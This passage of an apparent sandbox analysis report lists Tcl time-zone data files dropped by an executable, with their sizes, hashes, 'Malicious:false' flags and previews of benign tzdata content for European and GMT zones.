                                                                                                                                                                                                                              SHA1:5493A59C3A5A1B55ACD493E67F9E29D2A415A8DB
                                                                                                                                                                                                                              SHA-256:9FA9D09509B4F8F5A9C8E422DBA02605070C3EBDAEB7C1DF8527C8EEF5E3632D
                                                                                                                                                                                                                              SHA-512:86222489C65C87646939DECF91C2EC336EB46F64B644526A3FA8A4854B9D11819F6FD253107AB8A3DE911E254C88092D25137442164A6E437CDAF258A7CBB66C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Ulyanovsk) {.. {-9223372036854775808 11616 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 7200 0 +02}.. {695779200 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):177
                                                                                                                                                                                                                              Entropy (8bit):5.051734481833866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa2rUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yFC
                                                                                                                                                                                                                              MD5:17A0CC51331756920B13FFA3FF556751
                                                                                                                                                                                                                              SHA1:C575FEF4F053393C57B34C7C7B0C1E9605413792
                                                                                                                                                                                                                              SHA-256:F8CAF5DBE12F1647B28E7CCDDB2E09E36788A766690D12E770A8ABD82E708644
                                                                                                                                                                                                                              SHA-512:E73F0FE5BE4DD91948A88DC895E148D81267576BA3BCFEA777E25C01EAE9C06845DBFFB651526045B70B7A3CCDB195DFFF60486C01E0A115DFB856873970008E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Uzhgorod) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.953146873643623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQa1NEHp8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/yvNEJ8G
                                                                                                                                                                                                                              MD5:A0BAEC8B6AF1589ECBE52667DDB2A153
                                                                                                                                                                                                                              SHA1:37093F4F885CBFA90A1F136D082E8B7546244ACC
                                                                                                                                                                                                                              SHA-256:06B235BF047FC2303102BC3DC609A5754A6103321D28440B74EEC1C9E3D24642
                                                                                                                                                                                                                              SHA-512:DBEC235AFB413FA8D116FA1AFFE73706762E7458038B6D68E0BFD71C339510D766825BA97055A06DEE14D5880EAE6CD035BFE0C935C0DF44B0107A356D293A78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.914414313741477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQa1xLM1p8QaxE:SlSWB9vsM3ymx5PHAIgoxvN/yvN+8rE
                                                                                                                                                                                                                              MD5:2404265F8DE1F7D7745893DD4752BA1C
                                                                                                                                                                                                                              SHA1:C07E7F72DBDC7F5F746385523EA733C2714F5DA2
                                                                                                                                                                                                                              SHA-256:C203E94465BD1D91018FC7670437226EF9A4BB41D59DDE49095363865CA33D00
                                                                                                                                                                                                                              SHA-512:5C20834542B74041AAB1DBE35686781B32EEB5814B1A35A942E87D1FC3B6D8F9264CB90433C44A480EA86DDEA65D8C152F41CE3E983C1DE5FA74D6FB5208F701
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/Vatican) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7930
                                                                                                                                                                                                                              Entropy (8bit):3.8193566380830273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:8F6zq+gH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:8ozE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:6A3A8055DD67174E853C7A208BABAC9B
                                                                                                                                                                                                                              SHA1:64445543DE9D6C01FA858442976E249E37BE23EF
                                                                                                                                                                                                                              SHA-256:A8165313C9B51DAEF130401439CBA60DAA9887FC5EAA61A5AFD4F7BAD1AD934F
                                                                                                                                                                                                                              SHA-512:4407B9E8709A8DD05337A10030895AA9876EAF64EF5347952249EE2A541E304331B46D38532FD7CDFF9E633BF8C9884282F0A5ED259EBA1D99DC0914AF1A50C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vienna) {.. {-9223372036854775808 3921 0 LMT}.. {-2422055121 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1577926800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555801200 3600 0 CET}.. {-938905200 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780188400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {323823600 7200 1 CEST}.. {338940000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CE
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7485
                                                                                                                                                                                                                              Entropy (8bit):3.7711709848169592
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:FAhEpkwCXkSV3A/PplKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:FfWHUSKivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:1AB5FCEACC4E09074BA9F72F0B7747D5
                                                                                                                                                                                                                              SHA1:E0134E61EC0ADC60BF6DB4544EA7B7FFA4EC7857
                                                                                                                                                                                                                              SHA-256:B762DB4A068DC79FA57691E070D7026086E5A6D2FC273D5C1872E7C8E3711533
                                                                                                                                                                                                                              SHA-512:07565071D05CF972DD64F6060599EB68A00BF264172873BA310168AD07CE0CFCF90D0019B775433EC910DA748B89F0C614E7FD4E821993DA53C7E33F194C6A97
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vilnius) {.. {-9223372036854775808 6076 0 LMT}.. {-2840146876 5040 0 WMT}.. {-1672536240 5736 0 KMT}.. {-1585100136 3600 0 CET}.. {-1561251600 7200 0 EET}.. {-1553565600 3600 0 CET}.. {-928198800 10800 0 MSK}.. {-900126000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-802141200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 7200 0 EEMMTT}.. {606873600 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2123
                                                                                                                                                                                                                              Entropy (8bit):3.667144931158014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:menvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDqR:mevCAs6kC6aZF1cSNcjXgV/ApDFjDqR
                                                                                                                                                                                                                              MD5:53E5BA5747B3255BB049F6FF651CEE25
                                                                                                                                                                                                                              SHA1:A69E2BFDB89AC8756E1CD2EAA9109ACD924A0850
                                                                                                                                                                                                                              SHA-256:22968D40DAC2B669E6D2BC43ED6B16C8A9CA3E1F9DACBF8B246299C3C24CC397
                                                                                                                                                                                                                              SHA-512:3269D20DF9C9DDFF8252F33ED563B118771FC71049542DA7C6678E0B5B75FFEA00845FA6F3BC26EDABB4BB7CE449B0B7E00B72473D8D95F126AB3893A9A969B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Volgograd) {.. {-9223372036854775808 10660 0 LMT}.. {-1577761060 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-256881600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8662
                                                                                                                                                                                                                              Entropy (8bit):3.8187545871488995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ELn9M9Nivtctwwoy4qelPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCso:E6Nivtctgq1sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:992C1D268E336AF1FB8200966C111644
                                                                                                                                                                                                                              SHA1:C893B82224C8EF282DB2E16A5BBCC3A21C49B6FE
                                                                                                                                                                                                                              SHA-256:F9DC10EC2AE2CC810A6C08837059B34BE651900BA4E1CEDB93C209972CCFB5A2
                                                                                                                                                                                                                              SHA-512:EC4E0D8684D57FA66144F11D8E8C80E5272D4A7304300FEBE20E236476C1B8B33BBC5E479BF96D9ED12900FE6D41DD1DC0D11CBE02B89E0C4C7A153B4BFBCB1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Warsaw) {.. {-9223372036854775808 5040 0 LMT}.. {-2840145840 5040 0 WMT}.. {-1717032240 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618696800 7200 0 EET}.. {-1600473600 10800 1 EEST}.. {-1587168000 7200 0 EET}.. {-931734000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796870800 7200 0 CEST}.. {-796608000 3600 0 CET}.. {-778726800 7200 1 CEST}.. {-762660000 3600 0 CET}.. {-748486800 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-715215600 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-397094400 7200 1 CEST}.. {-386812800 3600 0 CET}.. {-371088000 72
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.899266605519742
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQa5rXv1/h8Q0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNB
                                                                                                                                                                                                                              MD5:B07D9D3A5B0D11A578F77995A5FBE12B
                                                                                                                                                                                                                              SHA1:1C4E186F2D53C0A1E6A82A6D33B172E403A41D6D
                                                                                                                                                                                                                              SHA-256:A49B3894EB84F003EB357647D6A40CEAF6213523196CC1EC24EEFD7D9D6D3C3E
                                                                                                                                                                                                                              SHA-512:43520AE325980B236C47C866620D1DA200AC0CD794E8EB642D2936D4B0ECEFE2DA0A93C9559D08581B3CCE2BC75251A4D5B967D376B16EB0C042B0ADCE1DCD01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.999265802825238
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa58KXkcAEfh8Qaocqn:SlSWB9vsM3ym5HAIgoiAN/yjzVbh8C
                                                                                                                                                                                                                              MD5:5B150E25521FE5DD8B83DD9B1B8F3A7A
                                                                                                                                                                                                                              SHA1:0BB6F73F2C4B2464F3B1E62138843389AF1A07BC
                                                                                                                                                                                                                              SHA-256:EF928AC09B9A366FD015F488B6A19FEFD72DE1BAF34E5CADFB8334946BCF19FE
                                                                                                                                                                                                                              SHA-512:4A85A4E929EC6FE66AE60899FA55A75156D075CB2FE41C19337A128F5FA7363B9208AC2DC1BF4E44B76D5F115143D73F6D923E255EA78538D1BE4E45DEBA2049
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Zaporozhye) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7305
                                                                                                                                                                                                                              Entropy (8bit):3.8199799674700277
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:94hH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:9Y41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:EBD66FAEA63E1B90122CC1EB21634ECE
                                                                                                                                                                                                                              SHA1:C6487BB8AB2A6A72B2170B220F383ADB6B9AC91C
                                                                                                                                                                                                                              SHA-256:95AFA61E439CA38551306D8FDB11C2788D935C42768D0407C9E4337F105A3E93
                                                                                                                                                                                                                              SHA-512:25A8D0ED9BBE6BF23A1A76CC6D5378CF4D50544AA22DA97DDCD0673D7A5CCFEFFD81B660A1AEFB254B8BBEA55F6EF734BBBD3F0CB903E0721BE107667CA1E328
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Zurich) {.. {-9223372036854775808 2048 0 LMT}.. {-3675198848 1786 0 BMT}.. {-2385246586 3600 0 CET}.. {-904435200 7200 1 CEST}.. {-891129600 3600 0 CET}.. {-872985600 7200 1 CEST}.. {-859680000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.8978035005721265
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/wox6QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/wRj
                                                                                                                                                                                                                              MD5:68667037110E713DB3F51922DDE929FE
                                                                                                                                                                                                                              SHA1:2EB02BE3FD35F105B59847892A78F1AA21754541
                                                                                                                                                                                                                              SHA-256:E20D829C605A7C5B2A96B83C3480DF28C964A13381A8BD2C72C2A37295131FA7
                                                                                                                                                                                                                              SHA-512:3A8CC2EC9E3053283F996CA2C4B422061D47F1D16CA07985CBA2C838DF322C23CC9DD28033646F22EAE0E401781480B9D3AF82A539444166A4DD9B7BCCAE45FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):175
                                                                                                                                                                                                                              Entropy (8bit):4.90874180513438
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/w4b/h8QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/w4E
                                                                                                                                                                                                                              MD5:625520BAAB774520AC54BFB9EDCF9FCA
                                                                                                                                                                                                                              SHA1:C72F0FD45F448901C6B2E24243175729591B9A54
                                                                                                                                                                                                                              SHA-256:C9334480D0A970254B6BA6FF22E958DC8DD8BF06288229461A551C7C094C3F1D
                                                                                                                                                                                                                              SHA-512:1B672218FF9C86168E065A98C3B5F67DAB710D1C2A319E9D6599B397C4B4C00D3721B76C735C8AB04BCB618C1832B07F6CCDAF4266CC0D12A461A3A862D1AEB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB-Eire) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.867609984313873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wZ8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wZ8RQy
                                                                                                                                                                                                                              MD5:A01FE6FC260711F0E11C85DC3DE3550A
                                                                                                                                                                                                                              SHA1:988311B71498591425C63669DC3F802F270B2C44
                                                                                                                                                                                                                              SHA-256:747C15CDC239855D5380B7A7F47112F2A26C61B0BF300EEB9711E6521550D189
                                                                                                                                                                                                                              SHA-512:BE4678DCBAE5DBC72865665413206C1909F28BA54F4943257870EFFBA6525457866DED7A985E89F2689C810B314DE4AA2FA3A0A1826A664727F5F7113AA56595
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.917182390229381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/we7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wI8RQy
                                                                                                                                                                                                                              MD5:3327B1BF3118AC6AFC02C31DF5B67CD9
                                                                                                                                                                                                                              SHA1:3932577E66801AD31519B0BB56CCE7B9E36221A9
                                                                                                                                                                                                                              SHA-256:BE48462CCFBB3AEE19597F082A17C2C5D2FD8BB1C9122245EFAB0A51F8F413B0
                                                                                                                                                                                                                              SHA-512:53866FD513B039E8203E51FF3434D5736D3A4C4E0A46874D1C99A17115181AF749F0D079C2E14C5B0538D3DFA52B1645C977CD6599DA3EDA57CC7F84EEAB2D06
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.904279164422928
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/w4Hp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/w4J8RQy
                                                                                                                                                                                                                              MD5:0CFFC5655F031D954BD623CC4C74DC9C
                                                                                                                                                                                                                              SHA1:CE5E7AD67252F52D7E70719725FF5BE393DD6EF0
                                                                                                                                                                                                                              SHA-256:944C86F516141DDC3AEC1AE4A963E9769879C48ED12DADDF4ED63A01313ACD00
                                                                                                                                                                                                                              SHA-512:C7352D1394E8B8AC90CD19EE753D5277259BE5512ADDCAED2A2DEF144762CF20BE7A9FA09AAA1829EE401DD195C2AED8C967A7FF46739236E042AF4298EC84A2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                              Entropy (8bit):4.892526720357546
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wPHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wvp8RQy
                                                                                                                                                                                                                              MD5:565B41A5DB28F9FE7D220E9BA39062A4
                                                                                                                                                                                                                              SHA1:5183689210F07C8A71F880DCE8E5C2CB62CEB17D
                                                                                                                                                                                                                              SHA-256:54850A5F488205DB01FBB46E2DA9FFF951C4571029EA64D35932DDEA5346DAAF
                                                                                                                                                                                                                              SHA-512:BD6E5141F06B03D62DCF725E9E48D6AA8ECD6E8E47A4015B25DC3F672392065FFFD80D688C6695324DC105EA528025CF447FA77E6D17E15D438E61DC51879CB7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.917976058206477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wE+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/wE6BURQy
                                                                                                                                                                                                                              MD5:443FA76F107ED438F9571A044B848C6A
